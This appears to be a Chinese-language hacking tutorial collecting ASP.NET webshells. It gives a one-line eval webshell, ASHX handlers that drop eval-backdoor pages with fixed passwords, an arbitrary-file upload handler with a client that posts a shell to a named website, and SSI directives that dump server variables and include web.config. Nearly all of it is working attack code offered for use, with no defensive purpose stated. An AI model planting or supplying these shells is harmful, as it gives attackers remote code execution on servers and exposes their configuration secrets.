一、標准ASPX一句話木馬
.NET平台下的一句話木馬則百年不變,最常見的當屬下面這句
| <%@ Page Language=”Jscript”%><%eval(Request.Item[“pass”],”unsafe”);%> |
想必這句話已經成大多數防御產品的標准樣本,除此以外還有上傳文件的一句話,像這種的從嚴格意義上不能算是一句話木馬,只是一個簡單的上傳文件的功能,實際的操作還是大馬或者小馬的操作行為。
| <%if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(Request[“f”]) ); }%> |
二、ASHX一句話木馬
ashx馬兒 https://github.com/tennc/webshell/blob/master/caidao-shell/customize.ashx
這個馬兒已經實現了菜刀可連,可用,還是挺棒的,但因為體積過大,並且在服務端實現了大多數功能,其實更像是一個大馬,只是對客戶端的菜刀做了適配可用。
二、ASHX寫文件木馬
木馬執行后會在當前目錄下生成webshell.asp一句話木馬,密碼是pass 也可以寫入其它文件。
<%@ WebHandler Language="C#" class="Handler"% >
using System;
using System.Web;
using System.IO;
public class Handler:IHttpHandler {
public void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";
StreamWriter file = File.CreateText(context.Server.MapPath("webshell.asp")));
file.Write("<%eval request(\"pass\")%>");
file.Flush();
file.Close();
context.Response.Write("www.webshell.cc");
}
public bool IsReusable {
get {
return false;
}
}
}
將腳本中的Asp一句話改成菜刀的Aspx一句話~不過執行的時候爆錯,說未知指令@Page。遂采用一下2種方式解決:
1.用String連接字符串
- <%@ WebHandler Language="C#" Class="Handler" %>
- using System;
- using System.Web;
- using System.IO;
- public class Handler : IHttpHandler {
- public void ProcessRequest (HttpContext context) {
- context.Response.ContentType = "text/plain";
- string show="<% @Page Language=\"Jscript\"%"+"><%eval(Request.Item"+"[\"chopper\"]"+",\"unsafe\");%>";
- StreamWriter file1= File.CreateText(context.Server.MapPath("root.aspx"));
- file1.Write(show);
- file1.Flush();
- file1.Close();
- }
- public bool IsReusable {
- get {
- return false;
- }
- }
- }
2.比較笨的方法,看代碼吧
- <%@ WebHandler Language="C#" Class="Uploader" %>
- using System;
- using System.IO;
- using System.Web;
- public class Uploader : IHttpHandler
- {
- public void ProcessRequest(HttpContext hc)
- {
- foreach (string fileKey in hc.Request.Files)
- {
- HttpPostedFile file = hc.Request.Files[fileKey];
- file.SaveAs(Path.Combine(hc.Server.MapPath("."), file.FileName));
- }
- }
- public bool IsReusable
- {
- get { return true; }
- }
- }
然后用VS建立WinForm程序~主函數里寫:
- System.Net.WebClient myWebClient = new System.Net.WebClient();
- myWebClient.UploadFile("http://www.xcnzz.com/Uploader.ashx", "POST", "C:\\ma.aspx");
三、stm/shtm/shtml腳本
雖然不能直接拿到webshell,但是可以獲取到一些服務器信息。注意stm中的include可以將web.config文件中的內容包含進來。
<!--#ECHO var="ALL_HTTP"-->
當前文件名稱:<!--#ECHO var="DOCUMENT_NAME"-->
Web服務器的名稱和版本:<!--#ECHO var="SERVER_SOFTWARE"-->
主機名:<!--#ECHO var="SERVER_NAME"-->
端口:<!--#ECHO var="SERVER_PORT"-->
客戶或客戶代理IP地址:<!--#ECHO var="REMOTE_ADDR"-->
客戶或客戶代理主機名:<!--#ECHO var="REMOTE_HOST"-->
PATH_INFO 的值,但帶有擴展為某個目錄規范的虛擬路徑:
<!--#ECHO var="PATH_TRANSLATED"-->
客戶端給出附加路徑信息:<!--#ECHO var="PATH_INFO"-->
<!--#ECHO var="HTTP_ACCEPT"-->
<!--#ECHO var="DOCUMENT_URI"-->
<!--#include file="../../web.config"-->